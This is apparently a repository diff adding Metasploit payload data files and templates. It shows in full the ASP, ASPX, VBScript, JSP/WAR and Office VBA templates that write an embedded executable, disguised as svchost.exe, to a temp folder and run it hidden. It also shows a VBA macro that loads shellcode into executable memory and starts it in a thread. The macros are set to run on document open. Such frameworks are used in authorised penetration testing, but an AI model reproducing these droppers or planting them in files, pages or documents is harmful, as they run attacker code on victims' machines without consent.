sempervictus
diff --git a/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 857 additions & 0 deletions b/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 857 additions & 0 deletions
diff --git a/‎data/meterpreter/meterpreter.py
Lines changed: 410 additions & 0 deletions b/‎data/meterpreter/meterpreter.py
Lines changed: 410 additions & 0 deletions
diff --git a/‎data/meterpreter/metsrv.dll
1 KB b/‎data/meterpreter/metsrv.dll
1 KB
diff --git a/‎data/meterpreter/metsrv.x64.dll
512 Bytes b/‎data/meterpreter/metsrv.x64.dll
512 Bytes
diff --git a/‎data/templates/scripts/to_exe.asp.template
Lines changed: 24 additions & 0 deletions b/‎data/templates/scripts/to_exe.asp.template
Lines changed: 24 additions & 0 deletions
diff --git a/‎data/templates/scripts/to_exe.aspx.template
Lines changed: 30 additions & 0 deletions b/‎data/templates/scripts/to_exe.aspx.template
Lines changed: 30 additions & 0 deletions
diff --git a/‎data/templates/scripts/to_exe.vba.template
Lines changed: 81 additions & 0 deletions b/‎data/templates/scripts/to_exe.vba.template
Lines changed: 81 additions & 0 deletions
diff --git a/‎data/templates/scripts/to_exe.vbs.template
Lines changed: 24 additions & 0 deletions b/‎data/templates/scripts/to_exe.vbs.template
Lines changed: 24 additions & 0 deletions
diff --git a/‎data/templates/scripts/to_exe_jsp.war.template
Lines changed: 49 additions & 0 deletions b/‎data/templates/scripts/to_exe_jsp.war.template
Lines changed: 49 additions & 0 deletions
diff --git a/‎data/templates/scripts/to_mem.vba.template
Lines changed: 32 additions & 0 deletions b/‎data/templates/scripts/to_mem.vba.template
Lines changed: 32 additions & 0 deletions
@@ -0,0 +1,24 @@
+<%% @language="VBScript" %%>
+<%% 
+	Sub %{var_func}()
+		%{var_shellcode}
+		Dim %{var_obj}
+		Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+		Dim %{var_stream}
+		Dim %{var_tempdir}
+		Dim %{var_tempexe}
+		Dim %{var_basedir}
+		Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+		%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+		%{var_obj}.CreateFolder(%{var_basedir})
+		%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+		Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
+		%{var_stream}.Write %{var_bytes}
+		%{var_stream}.Close
+		Dim %{var_shell}
+		Set %{var_shell} = CreateObject("Wscript.Shell")
+		%{var_shell}.run %{var_tempexe}, 0, false
+	End Sub
+
+	%{var_func}
+%%>
@@ -0,0 +1,30 @@
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
+<script runat="server">
+	protected void Page_Load(object sender, EventArgs e)
+	{
+		%{shellcode}
+		string %{var_tempdir} = Path.GetTempPath();
+		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
+		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
+		
+		Directory.CreateDirectory(%{var_basedir});
+		
+		FileStream fs = File.Create(%{var_tempexe});
+		
+		try
+		{
+			fs.Write(%{var_file}, 0, %{var_file}.Length);
+		}
+		finally
+		{
+			if (fs != null) ((IDisposable)fs).Dispose();
+		}
+
+		System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
+		%{var_proc}.StartInfo.CreateNoWindow = true;
+		%{var_proc}.StartInfo.UseShellExecute = true;
+		%{var_proc}.StartInfo.FileName = %{var_tempexe};
+		%{var_proc}.Start();
+	}
+</script>
@@ -0,0 +1,81 @@
+'**************************************************************
+'*
+'* This code is now split into two pieces:
+'*  1. The Macro. This must be copied into the Office document
+'*     macro editor. This macro will run on startup.
+'*
+'*  2. The Data. The hex dump at the end of this output must be
+'*     appended to the end of the document contents.
+'*
+'**************************************************************
+'*
+'* MACRO CODE
+'*
+'**************************************************************
+
+Sub Auto_Open()
+	%{func_name1}
+End Sub
+
+Sub %{func_name1}()
+	Dim %{var_appnr} As Integer
+	Dim %{var_fname} As String
+	Dim %{var_fenvi} As String
+	Dim %{var_fhand} As Integer
+	Dim %{var_parag} As Paragraph
+	Dim %{var_index} As Integer
+	Dim %{var_gotmagic} As Boolean
+	Dim %{var_itemp} As Integer
+	Dim %{var_stemp} As String
+	Dim %{var_btemp} As Byte
+	Dim %{var_magic} as String
+	%{var_magic} = "%{var_magic}"
+	%{var_fname} = "%{filename}.exe"
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_fhand} = FreeFile()
+	Open %{var_fname} For Binary As %{var_fhand}
+	For Each %{var_parag} in ActiveDocument.Paragraphs
+		DoEvents
+			%{var_stemp} = %{var_parag}.Range.Text
+		If (%{var_gotmagic} = True) Then
+			%{var_index} = 1
+			While (%{var_index} < Len(%{var_stemp}))
+				%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
+				Put #%{var_fhand}, , %{var_btemp}
+				%{var_index} = %{var_index} + 4
+			Wend
+		ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
+			%{var_gotmagic} = True
+		End If
+	Next
+	Close #%{var_fhand}
+	%{func_name2}(%{var_fname})
+End Sub
+
+Sub %{func_name2}(%{var_farg} As String)
+	Dim %{var_appnr} As Integer
+	Dim %{var_fenvi} As String
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_appnr} = Shell(%{var_farg}, vbHide)
+End Sub
+
+Sub AutoOpen()
+	Auto_Open
+End Sub
+
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+
+'**************************************************************
+'*
+'* PAYLOAD DATA
+'*
+'**************************************************************
+
+%{var_magic}
+%{data}
@@ -0,0 +1,24 @@
+Function %{var_func}()
+%{var_shellcode}
+
+	Dim %{var_obj}
+	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
+	Dim %{var_tempdir}
+	Dim %{var_tempexe}
+	Dim %{var_basedir}
+	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	%{var_stream}.Write %{var_bytes}
+	%{var_stream}.Close
+	Dim %{var_shell}
+	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run %{var_tempexe}, 0, true
+	%{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFolder(%{var_basedir})
+End Function
+
+%{init}
@@ -0,0 +1,49 @@
+<%%@ page import="java.io.*" %%>
+<%%
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+	String %{var_data} = "";
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+	{
+		%{var_exepath} = %{var_exepath}.concat(".exe");
+	}
+
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+	int %{var_numbytes} = %{var_inputstream}.available();
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+	%{var_inputstream}.read(%{var_bytearray});
+	%{var_inputstream}.close();
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+	{
+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+		%{var_comb} <<= 4;
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+	}
+
+	%{var_outputstream}.write(%{var_bytes});
+	%{var_outputstream}.close();
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+		String[] %{var_fperm} = new String[3];
+		%{var_fperm}[0] = "chmod";
+		%{var_fperm}[1] = "+x";
+		%{var_fperm}[2] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+		if (%{var_proc}.waitFor() == 0) {
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+		}
+		
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+	} 
+	else 
+	{
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+	}
+%%>
@@ -0,0 +1,32 @@
+#If Vba7 Then
+	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
+	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
+	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
+#Else
+	Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
+	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
+	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
+#EndIf
+
+Sub Auto_Open()
+	Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
+#If Vba7 Then
+	Dim  %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
+#Else
+	Dim  %{var_rwxpage} As Long, %{var_res} As Long
+#EndIf
+	%{bytes}
+	%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
+	For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
+		%{var_myByte} = %{var_myArray}(%{var_offset})
+		%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
+	Next %{var_offset}
+	%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+	Auto_Open
+End Sub
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+